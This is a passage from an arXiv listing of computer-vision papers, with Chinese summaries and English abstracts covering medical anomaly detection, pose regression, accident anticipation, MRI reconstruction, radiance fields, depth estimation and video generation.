Abstract:Multimodal large language models (MLLMs) have recently demonstrated remarkable reasoning and perceptual abilities for anomaly detection. However, most approaches remain confined to image-level anomaly detection and textual reasoning, while pixel-level localization still relies on external vision modules and dense annotations. In this work, we activate the intrinsic reasoning potential of MLLMs to perform anomaly detection, pixel-level localization, and interpretable reasoning solely from image-level supervision, without any auxiliary components or pixel-wise labels. Specifically, we propose Reasoning-Driven Anomaly Localization (ReAL), which extracts anomaly-related tokens from the autoregressive reasoning process and aggregates their attention responses to produce pixel-level anomaly maps. We further introduce a Consistency-Guided Reasoning Optimization (CGRO) module that leverages reinforcement learning to align reasoning tokens with visual attentions, resulting in more coherent reasoning and accurate anomaly localization. Extensive experiments on four public benchmarks demonstrate that our method significantly improves anomaly detection, localization, and interpretability. Remarkably, despite relying solely on image-level supervision, our approach achieves performance competitive with MLLM-based methods trained under dense pixel-level supervision. Code is available at this https URL.
[CV-213] MEDIC-AD: Towards Medical Vision-Language Models Clinical Intelligence
【速读】:该论文旨在解决当前医学视觉语言模型(Medical Vision-Language Models, VLMs)在临床实践中缺乏将广泛知识转化为可操作输出的能力这一问题,具体聚焦于病灶检测(lesion detection)、症状追踪(symptom tracking)和视觉可解释性(visual explainability)三大核心任务。其解决方案的关键在于提出一个分阶段的框架MEDIC-AD:首先引入可学习的异常感知令牌(Ano),增强模型对异常区域的关注并构建以病灶为中心的判别性表征;其次设计图像间差异令牌(Diff),显式编码多期影像间的时序变化,从而区分疾病负担的恶化、改善与稳定;最后设置专门的可解释性阶段,训练模型生成与推理一致的热力图,提供清晰的可视化证据。该 staged design显著提升了模型在异常检测、症状追踪及异常分割上的性能,并在真实临床纵向数据上验证了其预测稳定性与临床可解释性。
链接: https://arxiv.org/abs/2603.27176
作者: Woohyeon Park,Jaeik Kim,Sunghwan Steve Cho,Pa Hong,Wookyoung Jeong,Yoojin Nam,Namjoon Kim,Ginny Y. Wong,Ka Chun Cheung,Jaeyoung Do
机构: Seoul National University (首尔国立大学); Samsung Changwon Hospital (三星昌原医院); Samsung Medical Center (三星医疗中心); NVIDIA (英伟达)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Lesion detection, symptom tracking, and visual explainability are central to real-world medical image analysis, yet current medical Vision-Language Models (VLMs) still lack mechanisms that translate their broad knowledge into clinically actionable outputs. To bridge this gap, we present MEDIC-AD, a clinically oriented VLM that strengthens these three capabilities through a stage-wise framework. First, learnable anomaly-aware tokens (Ano) encourage the model to focus on abnormal regions and build more discriminative lesion centered representations. Second, inter image difference tokens (Diff) explicitly encode temporal changes between studies, allowing the model to distinguish worsening, improvement, and stability in disease burden. Finally, a dedicated explainability stage trains the model to generate heatmaps that highlight lesion-related regions, offering clear visual evidence that is consistent with the model’s reasoning. Through our staged design, MEDIC-AD steadily boosts performance across anomaly detection, symptom tracking, and anomaly segmentation, achieving state-of-the-art results compared with both closed source and medical-specialized baselines. Evaluations on real longitudinal clinical data collected from real hospital workflows further show that MEDIC-AD delivers stable predictions and clinically faithful explanations in practical patient-monitoring and decision-support workflows
[CV-214] MultiLoc: Multi-view Guided Relative Pose Regression for Fast and Robust Visual Re-Localization
【速读】:该论文旨在解决相对位姿回归(Relative Pose Regression, RPR)在未见环境中性能受限的问题,其核心瓶颈在于现有方法依赖成对且局部的空间视角,难以建模全局一致的几何与空间关系。解决方案的关键在于提出MultiLoc模型,该模型通过在单次前向传播中联合融合多个参考视图及其对应的相机位姿,实现全局一致的空间和几何理解;同时引入基于共可见性的检索策略,以可靠地选取几何相关的参考视图作为上下文信息,从而显著提升零样本位姿估计的准确性与实时性。
链接: https://arxiv.org/abs/2603.27170
作者: Nobel Dang,Bing Li
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Relative Pose Regression (RPR) generalizes well to unseen environments, but its performance is often limited due to pairwise and local spatial views. To this end, we propose MultiLoc, a novel multi-view guided RPR model trained at scale, equipping relative pose regression with globally consistent spatial and geometric understanding. Specifically, our method jointly fuses multiple reference views and their associated camera poses in a single forward pass, enabling accurate zero-shot pose estimation with real-time efficiency. To reliably supply informative context, we further propose a co-visibility-driven retrieval strategy for geometrically relevant reference view selection. MultiLoc establishes a new benchmark in visual re-localization, consistently outperforming existing state-of-the-art (SOTA) relative pose regression (RPR) methods across diverse datasets, including WaySpots, Cambridge Landmarks, and Indoor6. Furthermore, MultiLoc’s pose regressor exhibits SOTA performance in relative pose estimation, surpassing RPR, feature matching and non-regression-based techniques on the MegaDepth-1500, ScanNet-1500, and ACID benchmarks. These results demonstrate robust domain generalization of MultiLoc across indoor, outdoor and natural environments. Code will be made publicly available.
[CV-215] RiskProp: Collision-Anchored Self-Supervised Risk Propagation for Early Accident Anticipation CVPR2026
【速读】:该论文旨在解决现有事故预判方法依赖主观且不一致的异常 onset 标注帧进行二元监督的问题,从而导致风险估计不准。其解决方案的关键在于提出 RiskProp,一种基于碰撞锚定的自监督风险传播范式,仅需可靠标注的碰撞帧即可建模时间上的风险演化过程;核心创新包括两个观察驱动的损失函数:一是利用未来帧预测作为软目标的未来帧正则化损失,实现风险信号向后传播;二是设计自适应单调约束以鼓励风险随时间非递减的趋势,从而提升早期预警能力与可解释性。
链接: https://arxiv.org/abs/2603.27165
作者: Yiyang Zou,Tianhao Zhao,Peilun Xiao,Hongyu Jin,Longyu Qi,Yuxuan Li,Liyin Liang,Yifeng Qian,Chunbo Lai,Yutian Lin,Zhihui Li,Yu Wu
机构: Wuhan University (武汉大学); Zhongguancun Academy (中关村学院); Didi Chuxing (滴滴出行); University of Science and Technology of China (中国科学技术大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted by CVPR 2026
Abstract:Accident anticipation aims to predict impending collisions from dashcam videos and trigger early alerts. Existing methods rely on binary supervision with manually annotated “anomaly onset” frames, which are subjective and inconsistent, leading to inaccurate risk estimation. In contrast, we propose RiskProp, a novel collision-anchored self-supervised risk propagation paradigm for early accident anticipation, which removes the need for anomaly onset annotations and leverages only the reliably annotated collision frame. RiskProp models temporal risk evolution through two observation-driven losses: first, since future frames contain more definitive evidence of an impending accident, we introduce a future-frame regularization loss that uses the model’s next-frame prediction as a soft target to supervise the current frame, enabling backward propagation of risk signals; second, inspired by the empirical trend of rising risk before accidents, we design an adaptive monotonic constraint to encourage a non-decreasing progression over time. Experiments on CAP and Nexar demonstrate that RiskProp achieves state-of-the-art performance and produces smoother, more discriminative risk curves, improving both early anticipation and interpretability.
[CV-216] Weakly Convex Ridge Regularization for 3D Non-Cartesian MRI Reconstruction
【速读】:该论文旨在解决非笛卡尔(non-Cartesian)磁共振成像(MRI)中因高加速采集导致的重建延迟问题,同时克服现有基于深度学习的重建方法在分布偏移(distribution shift)下稳定性与鲁棒性不足的缺陷。其解决方案的关键在于设计了一种旋转不变的弱凸脊正则化器(weakly convex ridge regularizer, WCRR),并将其嵌入变分重建框架中,从而在保证重建质量的同时显著提升计算效率和对不同采集协议(如GoLF SPARKLING和CAIPIRINHA)的鲁棒性,实现了传统变分方法与现代深度学习方法的优势统一。
链接: https://arxiv.org/abs/2603.27158
作者: German Shâma Wache,Chaithya G R,Asma Tanabene,Sebastian Neumayer
机构: Chemnitz University of Technology (开姆尼茨工业大学); CEA Paris-Saclay (法国原子能和替代能源委员会巴黎萨克雷中心); Inria Saclay Centre (法国国家信息与自动化研究院萨克雷中心); Siemens Healthineers (西门子医疗)
类目: Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注:
Abstract:While highly accelerated non-Cartesian acquisition protocols significantly reduce scan time, they often entail long reconstruction delays. Deep learning based reconstruction methods can alleviate this, but often lack stability and robustness to distribution shifts. As an alternative, we train a rotation invariant weakly convex ridge regularizer (WCRR). The resulting variational reconstruction approach is benchmarked against state of the art methods on retrospectively simulated data and (out of distribution) on prospective GoLF SPARKLING and CAIPIRINHA acquisitions. Our approach consistently outperforms widely used baselines and achieves performance comparable to Plug and Play reconstruction with a state of the art 3D DRUNet denoiser, while offering substantially improved computational efficiency and robustness to acquisition changes. In summary, WCRR unifies the strengths of principled variational methods and modern deep learning based approaches.
[CV-217] DiffSoup: Direct Differentiable Rasterization of Triangle Soup for Extreme Radiance Field Simplification
【速读】:该论文旨在解决辐射场(Radiance Field)重建中如何实现高效在线传输与跨平台渲染的问题,尤其是在资源受限设备上保持高质量视觉效果的挑战。现有方法如3D高斯溅射(3D Gaussian Splatting)虽能实现实时高质量渲染,但模型复杂度高,难以在消费级硬件上部署。其解决方案的关键在于提出DiffSoup——一种基于少量三角形构成的“汤状”(soup)结构表示,每个三角形具有神经纹理(neural texture)和二值不透明度(binary opacity),并通过随机不透明度掩蔽(stochastic opacity masking)实现端到端可微分训练,无需平滑器(mollifier)即可稳定优化。该设计支持标准深度测试的光栅化,兼容传统图形管线,从而在消费级笔记本和移动设备上实现交互式渲染。
链接: https://arxiv.org/abs/2603.27151
作者: Kenji Tojo,Bernd Bickel,Nobuyuki Umetani
机构: The University of Tokyo (东京大学); ETH Zürich (苏黎世联邦理工学院)
类目: Graphics (cs.GR); Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Radiance field reconstruction aims to recover high-quality 3D representations from multi-view RGB images. Recent advances, such as 3D Gaussian splatting, enable real-time rendering with high visual fidelity on sufficiently powerful graphics hardware. However, efficient online transmission and rendering across diverse platforms requires drastic model simplification, reducing the number of primitives by several orders of magnitude. We introduce DiffSoup, a radiance field representation that employs a soup (i.e., a highly unstructured set) of a small number of triangles with neural textures and binary opacity. We show that this binary opacity representation is directly differentiable via stochastic opacity masking, enabling stable training without a mollifier (i.e., smooth rasterization). DiffSoup can be rasterized using standard depth testing, enabling seamless integration into traditional graphics pipelines and interactive rendering on consumer-grade laptops and mobile devices. Code is available at this https URL.
[CV-218] Follow Your Heart: Landmark-Guided Transducer Pose Scoring for Point-of-Care Echocardiography
【速读】:该论文旨在解决便携式经胸超声心动图(point-of-care transthoracic echocardiography, TTE)中初学者难以稳定获取高质量心尖四腔观(apical 4-chamber view, A4CH)的问题,以及由此导致的左心室射血分数(left ventricular ejection fraction, LVEF)测量准确性下降的问题。解决方案的关键在于提出一个级联的多任务神经网络架构,该架构包含两个核心模块:一是基于图像的探头姿态评分模块,用于判断当前探头位置是否接近或偏离最优A4CH视图;二是不确定性感知的左心室解剖标志点检测器,可自动定位关键解剖结构并实现LVEF的精准估算。该方法无需额外的探头位置追踪设备,仅依赖图像信息即可提供视觉引导和定量测量,具有在资源有限环境中部署的潜力。
链接: https://arxiv.org/abs/2603.27143
作者: Zaiyang Guo,Jessie N. Dong,Filippos Bellos,Jilei Hao,Emily J. MacKay,Trevor Chan,Shir Goldfinger,Sethu Reddy,Steven Vance,Jason J. Corso,Alison M. Pouch
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注: Accepted for oral presentation at the International Symposium on Biomedical Imaging 2026
Abstract:Point-of-care transthoracic echocardiography (TTE) makes it possible to assess a patient’s cardiac function in almost any setting. A critical step in the TTE exam is acquisition of the apical 4-chamber (A4CH) view, which is used to evaluate clinically impactful measurements such as left ventricular ejection fraction (LVEF). However, optimizing transducer pose for high-quality image acquisition and subsequent measurement is a challenging task, particularly for novice users. In this work, we present a multi-task network that provides feedback cues for A4CH view acquisition and automatically estimates LVEF in high-quality A4CH images. The network cascades a transducer pose scoring module and an uncertainty-aware LV landmark detector with automated LVEF estimation. A strength is that network training and inference do not require cumbersome or costly setups for transducer position tracking. We evaluate performance on point-of-care TTE data acquired with a spatially dense “sweep” protocol around the optimal A4CH view. The results demonstrate the network’s ability to determine when the transducer pose is on target, close to target, or far from target based on the images alone, while generating visual landmark cues that guide anatomical interpretation and orientation. In conclusion, we demonstrate a promising strategy to provide guidance for A4CH view acquisition, which may be useful when deploying point-of-care TTE in limited resource settings.
[CV-219] he Geometry of Robustness: Optimizing Loss Landscape Curvature and Feature Manifold Alignment for Robust Finetuning of Vision-Language Models
【速读】:该论文旨在解决视觉语言模型(Vision-Language Models, VLMs)在微调过程中面临的三重权衡问题:分布内(In-Distribution, ID)准确率、分布外(Out-of-Distribution, OOD)泛化能力与对抗鲁棒性之间的矛盾。现有方法仅能优化其中两个维度,例如保持ID/OOD性能但缺乏对抗鲁棒性,或通过对抗训练提升鲁棒性却牺牲了ID/OOD准确率。其核心洞察是,这一权衡源于参数空间中的尖锐各向异性极小值和特征空间中对扰动不稳定的表示。解决方案的关键在于提出GRACE(Gram-aligned Robustness via Adaptive Curvature Estimation),该框架基于鲁棒PAC-Bayes理论,联合正则化参数空间曲率与特征空间不变性:一方面利用局部曲率自适应调整权重扰动以促进平坦极小值;另一方面引入特征对齐损失确保干净样本、对抗样本及分布外样本下的表示一致性。实验表明,GRACE在ImageNet微调CLIP模型时,同时提升了ID准确率(+10.8%)和对抗准确率(+13.5%),并维持了接近零样本基线的OOD准确率(57.0% vs. 57.4%)。几何分析进一步验证了GRACE收敛至平坦极小值且无特征失真,为构建具备广义鲁棒性的基础VLM提供了理论依据。
链接: https://arxiv.org/abs/2603.27139
作者: Shivang Chopra,Shaunak Halbe,Chengyue Huan,Brisa Maneechotesuwan,Zsolt Kira
机构: Georgia Institute of Technology (佐治亚理工学院)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Fine-tuning approaches for Vision-Language Models (VLMs) face a critical three-way trade-off between In-Distribution (ID) accuracy, Out-of-Distribution (OOD) generalization, and adversarial robustness. Existing robust fine-tuning strategies resolve at most two axes of this trade-off. Generalization-preserving methods retain ID/OOD performance but leave models vulnerable to adversarial attacks, while adversarial training improves robustness to targeted attacks but degrades ID/OOD accuracy. Our key insight is that the robustness trade-off stems from two geometric failures: sharp, anisotropic minima in parameter space and unstable feature representations that deform under perturbation. To address this, we propose GRACE (Gram-aligned Robustness via Adaptive Curvature Estimation), a unified fine-tuning framework that jointly regularizes the parameter-space curvature and feature-space invariance for VLMs. Grounded in Robust PAC-Bayes theory, GRACE employs adaptive weight perturbations scaled by local curvature to promote flatter minima, combined with a feature alignment loss that maintains representation consistency across clean, adversarial, and OOD inputs. On ImageNet fine-tuning of CLIP models, GRACE simultaneously improves ID accuracy by 10.8%, and adversarial accuracy by 13.5% while maintaining 57.0% OOD accuracy (vs. 57.4% zero-shot baseline). Geometric analysis confirms that GRACE converges to flatter minima without feature distortion across distribution shifts, providing a principled step toward generalized robustness in foundation VLMs.
[CV-220] SJD-VP: Speculative Jacobi Decoding with Verification Prediction for Autoregressive Image Generation
【速读】:该论文旨在解决生成式 AI(Generative AI)中自回归图像生成时,推测解码(Speculative Jacobi Decoding, SJD)方法因令牌选择模糊性导致的推测令牌接受率低的问题。现有方法主要从宽松的令牌验证角度缓解此问题,但未能充分利用解码过程中的迭代动态特性。解决方案的关键在于提出一种基于验证预测的推测雅可比解码(Speculative Jacobi Decoding with Verification Prediction, SJD-VP),其核心思想是利用迭代过程中令牌概率的变化趋势来引导采样,优先选择概率上升的令牌,从而有效预测哪些令牌更可能通过后续验证,显著提升接受率。该方法具有即插即用特性,可无缝集成至现有 SJD 方法中,并在标准基准测试中持续加速自回归解码并提升图像生成质量。
链接: https://arxiv.org/abs/2603.27115
作者: Bingqi Shan,Baoquan Zhang,Xiaochen Qi,Xutao Li,Yunming Ye,Liqiang Nie
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Speculative Jacobi Decoding (SJD) has emerged as a promising method for accelerating autoregressive image generation. Despite its potential, existing SJD approaches often suffer from the low acceptance rate issue of speculative tokens due to token selection ambiguity. Recent works attempt to mitigate this issue primarily from the relaxed token verification perspective but fail to fully exploit the iterative dynamics of decoding. In this paper, we conduct an in-depth analysis and make a novel observation that tokens whose probabilities increase are more likely to match the verification-accepted and correct token. Based on this, we propose a novel Speculative Jacobi Decoding with Verification Prediction (SJD-VP). The key idea is to leverage the change in token probabilities across iterations to guide sampling, favoring tokens whose probabilities increase. This effectively predicts which tokens are likely to pass subsequent verification, boosting the acceptance rate. In particular, our SJD-VP is plug-and-play and can be seamlessly integrated into existing SJD methods. Extensive experiments on standard benchmarks demonstrate that our SJD-VP method consistently accelerates autoregressive decoding while improving image generation quality.
[CV-221] RailVQA: A Benchmark and Framework for Efficient Interpretable Visual Cognition in Automatic Train Operation
【速读】:该论文旨在解决自动列车运行(ATO)系统在复杂动态铁路环境中面临的两大核心问题:一是现有感知方法对罕见但关键的安全场景泛化能力差,且缺乏面向操作决策的高阶推理与规划能力;二是尽管大型多模态模型(LMMs)具备较强的通用性和认知能力,但在安全关键场景中受限于高计算开销和幻觉风险,同时缺乏可靠的领域专用评估基准。解决方案的关键在于提出两个创新:其一,构建首个针对ATO驾驶室视角视觉认知的VQA基准RailVQA-bench,包含20,000个单帧和1,168个视频问答对,用于系统性评估认知泛化与可解释性;其二,设计一种协同式大-小模型框架RailVQA-CoM,通过透明的三模块架构与自适应时间采样机制,将小模型的高效性与大模型的认知能力相结合,显著提升感知泛化性能、推理效率与跨域适应性,同时降低推理延迟并增强可解释性,支持即插即用部署于自动驾驶系统。
链接: https://arxiv.org/abs/2603.27112
作者: Sen Zhang,Runmei Li,Zhichao Zheng,Yuhe Zhang,Jiani Li,Kailun Zhang,Tao Zhang,Wenjun Wu,Qunbo Wang
机构: Beijing Jiaotong University (北京交通大学); Northwestern Polytechnical University (西北工业大学); Beihang University (北京航空航天大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Automatic Train Operation (ATO) relies on low-latency, reliable cab-view visual perception and decision-oriented inference to ensure safe operation in complex and dynamic railway environments. However, existing approaches focus primarily on basic perception and often generalize poorly to rare yet safety-critical corner cases. They also lack the high-level reasoning and planning capabilities required for operational decision-making. Although recent Large Multi-modal Models (LMMs) show strong generalization and cognitive capabilities, their use in safety-critical ATO is hindered by high computational cost and hallucination risk. Meanwhile, reliable domain-specific benchmarks for systematically evaluating cognitive capabilities are still lacking. To address these gaps, we introduce RailVQA-bench, the first VQA benchmark for cab-view visual cognition in ATO, comprising 20,000 single-frame and 1,168 video based QA pairs to evaluate cognitive generalization and interpretability in both static and dynamic scenarios. Furthermore, we propose RailVQA-CoM, a collaborative large-small model framework that combines small-model efficiency with large-model cognition via a transparent three-module architecture and adaptive temporal sampling, improving perceptual generalization and enabling efficient reasoning and planning. Experiments demonstrate that the proposed approach substantially improves performance, enhances interpretability, reduces inference latency, and strengthens cross-domain generalization, while enabling plug-and-play deployment in autonomous driving systems. Code and datasets will be available at this https URL.
[CV-222] MotiMem: Motion-Aware Approximate Memory for Energy-Efficient Neural Perception in Autonomous Vehicles
【速读】:该论文旨在解决高分辨率传感器在电池受限的电动汽车中因数据传输能耗过高而导致的内存墙问题,传统图像压缩方法因语义无感知且优化目标为存储而非总线切换活动,难以有效降低内存接口动态能耗。解决方案的关键在于提出一种软硬件协同设计的接口MotiMem:一方面利用时间相干性,通过轻量级2D运动传播动态识别感兴趣区域(Regions of Interest, RoI);另一方面采用混合稀疏感知编码策略,结合自适应翻转与截断机制诱导比特级稀疏性,从而显著降低内存访问能耗。实验表明,MotiMem在nuScenes、Waymo和KITTI数据集上使用16种检测模型时,可减少约43%的内存接口动态能量消耗,同时保持约93%的目标检测准确率,优于JPEG和WebP等标准编解码器。
链接: https://arxiv.org/abs/2603.27108
作者: Haohua Que,Mingkai Liu,Jiayue Xie,Haojia Gao,Jiajun Sun,Hongyi Xu,Handong Yao,Fei Qiao
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: 8 pages,6 figures,conference
Abstract:High-resolution sensors are critical for robust autonomous perception but impose a severe memory wall on battery-constrained electric vehicles. In these systems, data movement energy often outweighs computation. Traditional image compression is ill-suited as it is semantically blind and optimizes for storage rather than bus switching activity. We propose MotiMem, a hardware-software co-designed interface. Exploiting temporal coherence,MotiMem uses lightweight 2D Motion Propagation to dynamically identify Regions of Interest (RoI). Complementing this, a Hybrid Sparsity-Aware Coding scheme leverages adaptive inversion and truncation to induce bitlevel sparsity. Extensive experiments across nuScenes, Waymo, and KITTI with 16 detection models demonstrate that MotiMem reduces memory-interface dynamic energy by approximately 43 percent while retaining approximately 93 percent of the object detection accuracy, establishing a new Pareto frontier significantly superior to standard codecs like JPEG and WebP.
[CV-223] UniDAC: Universal Metric Depth Estimation for Any Camera
【速读】:该论文旨在解决单目度量深度估计(Monocular Metric Depth Estimation, MMDE)在不同相机类型(如鱼眼和360°相机)之间泛化能力差的问题。现有方法通常依赖于特定视角范围(Large-FoV)的训练数据或为不同相机域分别训练模型,限制了通用性。解决方案的关键在于提出UniDAC框架,通过将度量深度估计解耦为相对深度预测与空间变化尺度估计两个阶段,实现跨域鲁棒性;同时引入轻量级深度引导的尺度估计模块(Depth-Guided Scale Estimation),利用相对深度图指导粗尺度图上采样以捕捉局部尺度变化,并设计RoPE-φ这一畸变感知的位置嵌入机制,基于纬度加权尊重等距矩形投影(Equi-Rectangular Projection, ERP)的空间扭曲特性,从而在单一模型下实现跨相机类型的最优性能。
链接: https://arxiv.org/abs/2603.27105
作者: Girish Chandar Ganesan,Yuliang Guo,Liu Ren,Xiaoming Liu
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Monocular metric depth estimation (MMDE) is a core challenge in computer vision, playing a pivotal role in real-world applications that demand accurate spatial understanding. Although prior works have shown promising zero-shot performance in MMDE, they often struggle with generalization across diverse camera types, such as fisheye and 360^\circ cameras. Recent advances have addressed this through unified camera representations or canonical representation spaces, but they require either including large-FoV camera data during training or separately trained models for different domains. We propose UniDAC, an MMDE framework that presents universal robustness in all domains and generalizes across diverse cameras using a single model. We achieve this by decoupling metric depth estimation into relative depth prediction and spatially varying scale estimation, enabling robust performance across different domains. We propose a lightweight Depth-Guided Scale Estimation module that upsamples a coarse scale map to high resolution using the relative depth map as guidance to account for local scale variations. Furthermore, we introduce RoPE- \phi , a distortion-aware positional embedding that respects the spatial warping in Equi-Rectangular Projections (ERP) via latitude-aware weighting. UniDAC achieves state of the art (SoTA) in cross-camera generalization by consistently outperforming prior methods across all datasets.
[CV-224] LLM Enhanced Action Recognition via Hierarchical Global-Local Skeleton-Language Model
【速读】:该论文旨在解决基于骨骼的动作识别(Skeleton-based Human Action Recognition)中现有图卷积网络(GCN)方法依赖短程运动拓扑结构所导致的局限性,包括难以捕捉长距离关节依赖关系与复杂时间动态特性,以及跨模态语义对齐和理解能力不足的问题。解决方案的关键在于提出一种分层全局-局部骨架-语言模型(Hierarchical Global-Local Skeleton-Language Model, HocSLM),其核心创新包括:1)设计分层全局-局部网络(HGLNet),通过复合拓扑空间模块与双路径分层时间模块协同建模全局与局部尺度下的动态交互,同时保留人体物理结构先验知识,提升复杂时空关系的表征能力;2)利用大规模视觉语言模型(VLM)生成视频文本描述,提供丰富动作语义信息用于训练骨架-语言模型;3)引入骨架-语言序列融合模块,结合HGLNet特征与文本描述,借助骨架-语言模型(SLM)在统一语义空间内精确对齐骨骼时空特征与文本动作描述,显著增强模型的语义区分能力和跨模态理解性能。
链接: https://arxiv.org/abs/2603.27103
作者: Ruosi Wang,Fangwei Zuo,Lei Li,Zhaoqiang Xia
机构: Northwestern Polytechnical University (西北工业大学); Shandong University of Finance and Economics (山东财经大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Skeleton-based human action recognition has achieved remarkable progress in recent years. However, most existing GCN-based methods rely on short-range motion topologies, which not only struggle to capture long-range joint dependencies and complex temporal dynamics but also limit cross-modal semantic alignment and understanding due to insufficient modeling of action semantics. To address these challenges, we propose a hierarchical global-local skeleton-language model (HocSLM), enabling the large action model be more representative of action semantics. First, we design a hierarchical global-local network (HGLNet) that consists of a composite-topology spatial module and a dual-path hierarchical temporal module. By synergistically integrating multi-level global and local modules, HGLNet achieves dynamically collaborative modeling at both global and local scales while preserving prior knowledge of human physical structure, significantly enhancing the model’s representation of complex spatio-temporal relationships. Then, a large vision-language model (VLM) is employed to generate textual descriptions by passing the original RGB video sequences to this model, providing the rich action semantics for further training the skeleton-language model. Furthermore, we introduce a skeleton-language sequential fusion module by combining the features from HGLNet and the generated descriptions, which utilizes a skeleton-language model (SLM) for aligning skeletal spatio-temporal features and textual action descriptions precisely within a unified semantic space. The SLM model could significantly enhance the HGLNet’s semantic discrimination capabilities and cross-modal understanding abilities. Extensive experiments demonstrate that the proposed HocSLM achieves the state-of-the-art performance on three mainstream benchmark datasets: NTU RGB+D 60, NTU RGB+D 120, and Northwestern-UCLA.
[CV-225] PRUE: A Practical Recipe for Field Boundary Segmentation at Scale CVPR2026
【速读】:该论文旨在解决全球范围内农田边界精准提取的难题,尤其针对现有基于深度学习的遥感影像分割方法在光照变化、空间尺度差异及地理区域迁移时性能不稳定的问题。其关键解决方案在于提出一种融合U-Net主干网络、复合损失函数(composite loss functions)与针对性数据增强策略的新颖分割框架,显著提升了模型在真实世界条件下的性能和鲁棒性,在Fields of The World (FTW) 基准上实现了76%的交并比(IoU)和47%的物体F1分数(object-F1),较基线分别提升6%和9%,为可扩展、可复现的农田边界自动识别提供了实用技术路径。
链接: https://arxiv.org/abs/2603.27101
作者: Gedeon Muhawenayo,Caleb Robinson,Subash Khanal,Zhanpei Fang,Isaac Corley,Alexander Wollam,Tianyi Gao,Leonard Strnad,Ryan Avery,Lyndon Estes,Ana M. Tárano,Nathan Jacobs,Hannah Kerner
机构: Arizona State University (亚利桑那州立大学); Microsoft AI for Good (微软AI for Good); Washington University in St. Louis (圣路易斯华盛顿大学); Oregon State University (俄勒冈州立大学); Wherobots (Wherobots); Clark University (克拉克大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注: 12 pages, 3 figures, supplementary material. Accepted at CVPR 2026 (IEEE/CVF Conference on Computer Vision and Pattern Recognition)
Abstract:Large-scale maps of field boundaries are essential for agricultural monitoring tasks. Existing deep learning approaches for satellite-based field mapping are sensitive to illumination, spatial scale, and changes in geographic location. We conduct the first systematic evaluation of segmentation and geospatial foundation models (GFMs) for global field boundary delineation using the Fields of The World (FTW) benchmark. We evaluate 18 models under unified experimental settings, showing that a U-Net semantic segmentation model outperforms instance-based and GFM alternatives on a suite of performance and deployment metrics. We propose a new segmentation approach that combines a U-Net backbone, composite loss functions, and targeted data augmentations to enhance performance and robustness under real-world conditions. Our model achieves a 76% IoU and 47% object-F1 on FTW, an increase of 6% and 9% over the previous baseline. Our approach provides a practical framework for reliable, scalable, and reproducible field boundary delineation across model design, training, and inference. We release all models and model-derived field boundary datasets for five countries.
[CV-226] EFlow: Fast Few-Step Video Generator Training from Scratch via Efficient Solution Flow
【速读】:该论文旨在解决视频扩散变换器(Video Diffusion Transformers)在训练和推理过程中面临的两大瓶颈问题:一是每步注意力计算的二次复杂度导致的高计算成本,二是迭代采样步骤带来的延迟。解决方案的关键在于提出EFlow框架,其核心创新包括:(1)设计了门控局部-全局注意力机制(Gated Local-Global Attention),通过可丢弃令牌的混合模块显著降低每步计算量并保持稳定性;(2)提出路径丢弃引导训练(Path-Drop Guided Training)与均速度可加性正则化(Mean-Velocity Additivity Regularizer),以高效替代昂贵的指导目标并保障极低步数下的生成质量。该方案实现了从零开始训练的高效流水线,在Kinetics及大规模文本到视频数据集上达到竞争性性能,同时训练吞吐量提升最高达2.5倍,推理延迟降低45.3倍。
链接: https://arxiv.org/abs/2603.27086
作者: Dogyun Park,Yanyu Li,Sergey Tulyakov,Anil Kag
机构: Snap Inc.(Snap公司)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Scaling video diffusion transformers is fundamentally bottlenecked by two compounding costs: the expensive quadratic complexity of attention per step, and the iterative sampling steps. In this work, we propose EFlow, an efficient few-step training framework, that tackles these bottlenecks simultaneously. To reduce sampling steps, we build on a solution-flow objective that learns a function mapping a noised state at time t to time s. Making this formulation computationally feasible and high-quality at video scale, however, demands two complementary innovations. First, we propose Gated Local-Global Attention, a token-droppable hybrid block which is efficient, expressive, and remains highly stable under aggressive random token-dropping, substantially reducing per-step compute. Second, we develop an efficient few-step training recipe. We propose Path-Drop Guided training to replace the expensive guidance target with a computationally cheap, weak path. Furthermore, we augment this with a Mean-Velocity Additivity regularizer to ensure high fidelity at extremely low step counts. Together, our EFlow enables a practical from-scratch training pipeline, achieving up to 2.5x higher training throughput over standard solution-flow, and 45.3x lower inference latency than standard iterative models with competitive performance on Kinetics and large-scale text-to-video datasets.
[CV-227] SceneExpander: Expanding 3D Scenes with Free-Form Inserted Views
【速读】:该论文旨在解决3D场景扩展中的多视图一致性问题,即在用户主导的工作流中,如何将由生成式模型合成的新增视角无缝插入已有的3D重建场景,同时避免因几何错位、幻觉内容或视图依赖性伪影导致的全局一致性破坏。解决方案的关键在于提出SceneExpander框架,其通过测试时适配(test-time adaptation)对参数化前馈3D重建模型进行优化,并引入两种互补的知识蒸馏信号:锚点蒸馏(anchor distillation)利用真实捕获视图的几何线索稳定原始场景结构,插入视图自蒸馏(inserted-view self-distillation)则在保留观测支持预测的基础上,自适应调整潜在几何与外观以兼容错位的插入视图,从而实现高质量且一致的3D场景扩展。
链接: https://arxiv.org/abs/2603.27084
作者: Zijian He,enjie Liu,Yihao Wang,Weizhi Zhong,Huan Yuan,Kun Gai,Guangrun Wang,Guanbin Li
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
